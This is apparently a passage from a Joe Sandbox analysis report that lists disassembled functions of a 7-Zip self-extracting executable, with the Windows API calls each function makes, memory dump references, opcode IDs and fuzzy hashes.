                                                                                                                                                      • Associated: 00000008.00000002.2222597252.0000000000A99000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222627810.0000000000A9D000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222655994.0000000000AA0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_a70000_ClassroomEc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1445889803-0
                                                                                                                                                      • Opcode ID: 12733eaff2afae051c5160abd4ac157e254a4b03d6484bc7a2d83fa207b20220
                                                                                                                                                      • Instruction ID: 19a4c3b9f058b1c8038f775684f92ebe03e708a7054a4980e6f337769f2413d1
                                                                                                                                                      • Opcode Fuzzy Hash: 12733eaff2afae051c5160abd4ac157e254a4b03d6484bc7a2d83fa207b20220
                                                                                                                                                      • Instruction Fuzzy Hash: 84015E76E10214ABCF10DBF8DC8869EB7F8FB48355F56456AE901E7210EF305D428B90
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      • std::exception::exception.LIBCMTD ref: 00A7B72A
                                                                                                                                                      • std::exception::exception.LIBCMTD ref: 00A7B735
                                                                                                                                                      • std::exception::exception.LIBCMTD ref: 00A7B740
                                                                                                                                                      • std::exception::exception.LIBCMTD ref: 00A7B74B
                                                                                                                                                      • std::exception::exception.LIBCMTD ref: 00A7B756
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.2222445325.0000000000A71000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.2222418568.0000000000A70000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222597252.0000000000A99000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222627810.0000000000A9D000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222655994.0000000000AA0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_a70000_ClassroomEc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: std::exception::exception
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2807920213-0
                                                                                                                                                      • Opcode ID: f8b1769de61019bb7566d5c90b2c811e35ceb3ea17b41fd2fe326901ab575d52
                                                                                                                                                      • Instruction ID: b203be8940bf3dcd9abc4f6c6cf14e2ef10b8d463b84cf599ff1727ca01890a4
                                                                                                                                                      • Opcode Fuzzy Hash: f8b1769de61019bb7566d5c90b2c811e35ceb3ea17b41fd2fe326901ab575d52
                                                                                                                                                      • Instruction Fuzzy Hash: 13E00A30D05108EBCB08FBD8DE62A6DB3759F84344B1485DDE41A77342CA356F10EA96
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00A79240: GetSystemMetrics.USER32(0000000B), ref: 00A79289
                                                                                                                                                        • Part of subcall function 00A79240: GetSystemMetrics.USER32(0000000C), ref: 00A7929B
                                                                                                                                                      • GetSystemMetrics.USER32(00000007), ref: 00A7ABA3
                                                                                                                                                      • GetSystemMetrics.USER32(00000007), ref: 00A7ABBB
                                                                                                                                                      • _DebugHeapAllocator.LIBCPMTD ref: 00A7ABD9
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.2222445325.0000000000A71000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.2222418568.0000000000A70000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222597252.0000000000A99000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222627810.0000000000A9D000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222655994.0000000000AA0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_a70000_ClassroomEc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: MetricsSystem$AllocatorDebugHeap
                                                                                                                                                      • String ID: 100%%
                                                                                                                                                      • API String ID: 1530364085-568723177
                                                                                                                                                      • Opcode ID: 9776849e6deb98928621de889c6af7bc5ab8722ab604c7cfaca5529f2d93ed9f
                                                                                                                                                      • Instruction ID: fd83fde7d30c4721a2471ea9dee5dcf6e7bc2ebdae9c176a5eeba9cb277cede9
                                                                                                                                                      • Opcode Fuzzy Hash: 9776849e6deb98928621de889c6af7bc5ab8722ab604c7cfaca5529f2d93ed9f
                                                                                                                                                      • Instruction Fuzzy Hash: 3051CC35A002099FCB08DF98C991DEEBBB5BB98324F249159D505BB355DB30ED82CFA1
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      • SystemParametersInfoW.USER32(00000029,000001F4,000001F4,00000000), ref: 00A79163
                                                                                                                                                      • GetSystemMetrics.USER32(00000031), ref: 00A7919A
                                                                                                                                                      • CreateFontIndirectW.GDI32(?), ref: 00A791B3
                                                                                                                                                      • DeleteObject.GDI32(00000000), ref: 00A79213
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.2222445325.0000000000A71000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.2222418568.0000000000A70000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222597252.0000000000A99000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222627810.0000000000A9D000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222655994.0000000000AA0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_a70000_ClassroomEc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: System$CreateDeleteFontIndirectInfoMetricsObjectParameters
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1900162674-0
                                                                                                                                                      • Opcode ID: 576d49fabd5fa28a70a6c87493bbf6a84356e89cc6f611f2d35c55c8e06a7b6f
                                                                                                                                                      • Instruction ID: 3d4b259a0187767afa749c20813eae9845359adb432f4e73217759b29d549be6
                                                                                                                                                      • Opcode Fuzzy Hash: 576d49fabd5fa28a70a6c87493bbf6a84356e89cc6f611f2d35c55c8e06a7b6f
                                                                                                                                                      • Instruction Fuzzy Hash: CF31D8B4A8021E9FDB64DF54CC88BDAB7B4BB58304F1082D9A819A7351DB709EC5CF90
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00A797C0: GetDlgItem.USER32(00000000,?), ref: 00A797D8
                                                                                                                                                        • Part of subcall function 00A79890: ShowWindow.USER32(00000000,?,000004B2), ref: 00A798CA
                                                                                                                                                      • memset.MSVCRT ref: 00A7A2FA
                                                                                                                                                      • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00A7A30E
                                                                                                                                                      • SHGetFileInfoW.SHELL32(?,00000000,00000000,000002B4,00000103), ref: 00A7A32E
                                                                                                                                                        • Part of subcall function 00A78A60: GetDlgItem.USER32(?,00000000), ref: 00A78A72
                                                                                                                                                      • SetWindowLongW.USER32(00000000,000004B7,000000FC), ref: 00A7A35B
                                                                                                                                                        • Part of subcall function 00A793F0: GetModuleHandleW.KERNEL32(00000000,00000065), ref: 00A79410
                                                                                                                                                        • Part of subcall function 00A793F0: LoadIconW.USER32(00000000), ref: 00A79417
                                                                                                                                                        • Part of subcall function 00A793F0: GetSystemMetrics.USER32(00000032), ref: 00A79424
                                                                                                                                                        • Part of subcall function 00A793F0: GetSystemMetrics.USER32(00000031), ref: 00A7942D
                                                                                                                                                        • Part of subcall function 00A793F0: GetModuleHandleW.KERNEL32(00000000,00000065,00000001,00000000), ref: 00A7943A
                                                                                                                                                        • Part of subcall function 00A793F0: LoadImageW.USER32(00000000), ref: 00A79441
                                                                                                                                                        • Part of subcall function 00A793F0: GetWindowLongW.USER32(00000000,000004B2), ref: 00A7949A
                                                                                                                                                        • Part of subcall function 00A793F0: SetWindowLongW.USER32(00000000,000004B2,000000F0), ref: 00A794B6
                                                                                                                                                        • Part of subcall function 00A793F0: GetWindowLongW.USER32(00000000,000004B5), ref: 00A794CC
                                                                                                                                                        • Part of subcall function 00A793F0: SetWindowLongW.USER32(00000000,000004B5,000000F0), ref: 00A794E8
                                                                                                                                                        • Part of subcall function 00A7A5F0: SetFocus.USER32(00000000,000004B6,?,?,00A7A386), ref: 00A7A605
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.2222445325.0000000000A71000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.2222418568.0000000000A70000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222597252.0000000000A99000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222627810.0000000000A9D000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222655994.0000000000AA0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_a70000_ClassroomEc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Window$Long$System$HandleItemLoadMetricsModule$DirectoryFileFocusIconImageInfoShowmemset
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1941954457-0
                                                                                                                                                      • Opcode ID: 3d093818b7cf1bfd519ea2c8dd1e729d725b03b4ef4a4a0edf6aa71e085ae89a
                                                                                                                                                      • Instruction ID: 5911bfcf4218d5dfeafbda5429d4b336bc985189d6ad537fedd17be185ecbe74
                                                                                                                                                      • Opcode Fuzzy Hash: 3d093818b7cf1bfd519ea2c8dd1e729d725b03b4ef4a4a0edf6aa71e085ae89a
                                                                                                                                                      • Instruction Fuzzy Hash: FA2101B0A40258ABDB24EB54CD95FEE7736BB44704F0041DAA7196B2C1DBB45EC4CF58
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 00A8F23A
                                                                                                                                                      • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 00A8F245
                                                                                                                                                      • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 00A8F250
                                                                                                                                                      • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 00A8F25B
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.2222445325.0000000000A71000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.2222418568.0000000000A70000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222597252.0000000000A99000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222627810.0000000000A9D000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222655994.0000000000AA0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_a70000_ClassroomEc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ProcessorVirtual$Concurrency::RootRoot::
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3936482309-0
                                                                                                                                                      • Opcode ID: 735b02de2554931013301a33edab3d25c05a64bea15068d1d6116fd5ba41dda9
                                                                                                                                                      • Instruction ID: d7f20ddbce1fedf40e7d94b63925f952bc7e34dd4b93826e777b56a0c2dd434e
                                                                                                                                                      • Opcode Fuzzy Hash: 735b02de2554931013301a33edab3d25c05a64bea15068d1d6116fd5ba41dda9
                                                                                                                                                      • Instruction Fuzzy Hash: 1C315274A04108EFDB04DF98C6A4B9EB7F1AF45308F244198D4092B342C7759F45EBD5
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.2222445325.0000000000A71000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.2222418568.0000000000A70000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222597252.0000000000A99000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222627810.0000000000A9D000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222655994.0000000000AA0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_a70000_ClassroomEc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ??2@??3@ExceptionThrow_wmemmove
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2584154162-0
                                                                                                                                                      • Opcode ID: 270201c847157be863862f8f00697ea3d9dd6357a79309c56cacb6aa89dc1a71
                                                                                                                                                      • Instruction ID: 458ed7a183d413837fbbf9e726b95dc0bc8c8600b84f80f5ae1820066e2b9981
                                                                                                                                                      • Opcode Fuzzy Hash: 270201c847157be863862f8f00697ea3d9dd6357a79309c56cacb6aa89dc1a71
                                                                                                                                                      • Instruction Fuzzy Hash: 8D11E9B5A00109AFCB04EF98D6819AEB7F5FF88300F208569E809A7345D731EE40CBA5
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.2222445325.0000000000A71000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.2222418568.0000000000A70000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222597252.0000000000A99000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222627810.0000000000A9D000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222655994.0000000000AA0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_a70000_ClassroomEc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ??2@??3@ExceptionThrowmemcpy
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3462485524-0
                                                                                                                                                      • Opcode ID: 9fffac05fe227cdeab9907fd9d958c6743bf3e0dee8ec52e37ccd95f84ba2fc5
                                                                                                                                                      • Instruction ID: 3ca2938b7135e3aeed07cab347f0ddcd667383c9e0232238944058a37e1e46a4
                                                                                                                                                      • Opcode Fuzzy Hash: 9fffac05fe227cdeab9907fd9d958c6743bf3e0dee8ec52e37ccd95f84ba2fc5
                                                                                                                                                      • Instruction Fuzzy Hash: 4D11C8B5E10209AFCF04DF98D5819AEB7F5FF48300F218199E809A7351D731AE50CBA5
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 00A86BDA
                                                                                                                                                        • Part of subcall function 00A871D0: Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 00A871DA
                                                                                                                                                      • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 00A86BE5
                                                                                                                                                      • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 00A86BF0
                                                                                                                                                      • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 00A86BFB
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.2222445325.0000000000A71000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.2222418568.0000000000A70000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222597252.0000000000A99000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222627810.0000000000A9D000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222655994.0000000000AA0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_a70000_ClassroomEc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ProcessorVirtual$Concurrency::RootRoot::
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3936482309-0
                                                                                                                                                      • Opcode ID: 2c4501c96bd74accec890b11d17ea2065319cbeb277c11bf43d1de14d19e341c
                                                                                                                                                      • Instruction ID: de912a34d09806b2359465518091b3319318d7e52b67df2195d5a308322b5d47
                                                                                                                                                      • Opcode Fuzzy Hash: 2c4501c96bd74accec890b11d17ea2065319cbeb277c11bf43d1de14d19e341c
                                                                                                                                                      • Instruction Fuzzy Hash: 26019974A04108EBCB08EF98C6A5A5EB7F1EF44304F24419CD8052B342CB71AF41DBD5
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      • GetParent.USER32(?), ref: 00A75C98
                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 00A75CB3
                                                                                                                                                      • ScreenToClient.USER32(00000000,?), ref: 00A75CC1
                                                                                                                                                      • ScreenToClient.USER32(00000000,?), ref: 00A75CD2
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.2222445325.0000000000A71000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.2222418568.0000000000A70000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222597252.0000000000A99000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222627810.0000000000A9D000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222655994.0000000000AA0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_a70000_ClassroomEc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ClientScreen$ParentRectWindow
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2099118873-0
                                                                                                                                                      • Opcode ID: fc02df5e872843cc896ed6b4682cd54bc590ce7ab5fc2c6befd04ab89e0748e7
                                                                                                                                                      • Instruction ID: 0855126a4ca80a22b4310f9997ad8673c29cee1484459a989f10c2dfdfde05dc
                                                                                                                                                      • Opcode Fuzzy Hash: fc02df5e872843cc896ed6b4682cd54bc590ce7ab5fc2c6befd04ab89e0748e7
                                                                                                                                                      • Instruction Fuzzy Hash: 49F0D479A01208FBCB04DFE8DC48A9A77B8EB88312F10C54AFD09C7200DA35EA419B60
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      • _DebugHeapAllocator.LIBCPMTD ref: 00A789AF
                                                                                                                                                      • wsprintfW.USER32 ref: 00A789E1
                                                                                                                                                        • Part of subcall function 00A89450: _wmemmove.LIBCMTD ref: 00A8948E
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.2222445325.0000000000A71000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.2222418568.0000000000A70000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222597252.0000000000A99000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222627810.0000000000A9D000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222655994.0000000000AA0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_a70000_ClassroomEc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AllocatorDebugHeap_wmemmovewsprintf
                                                                                                                                                      • String ID: (%d%s)
                                                                                                                                                      • API String ID: 2575367435-2087557067
                                                                                                                                                      • Opcode ID: 720154ec8970cd11925800eb819f4d84bb2e296d277118c8820691efc0d86908
                                                                                                                                                      • Instruction ID: c0f88d645ae12d931e507d4c0599b22cb3ffcac98791c3819ee1a9267959d226
                                                                                                                                                      • Opcode Fuzzy Hash: 720154ec8970cd11925800eb819f4d84bb2e296d277118c8820691efc0d86908
                                                                                                                                                      • Instruction Fuzzy Hash: F90152B195021C9BDB24EB58DCC9BEA7378BB24304F5086D8A51DA3183EB706E94CF91
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      • MessageBoxA.USER32(00000000,Could not allocate memory,7-Zip SFX,00000010), ref: 00A77521
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.2222445325.0000000000A71000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.2222418568.0000000000A70000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222597252.0000000000A99000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222627810.0000000000A9D000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222655994.0000000000AA0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_a70000_ClassroomEc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Message
                                                                                                                                                      • String ID: 7-Zip SFX$Could not allocate memory
                                                                                                                                                      • API String ID: 2030045667-3806377612
                                                                                                                                                      • Opcode ID: 6459df2cf9b7c68bb4c1e1ce2993fccd3de3cc94b062f8b02233f96d5119d217
                                                                                                                                                      • Instruction ID: 8ba9cfd59fa90fb02d04fb13fc4e9bb62294d9e5cc26d5739a4ffffab4d52e3d
                                                                                                                                                      • Opcode Fuzzy Hash: 6459df2cf9b7c68bb4c1e1ce2993fccd3de3cc94b062f8b02233f96d5119d217
                                                                                                                                                      • Instruction Fuzzy Hash: 89B092343E83097BE940A2F56C0BF033AC8B728F56F400912F208AC4D2D8C2A0505096
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%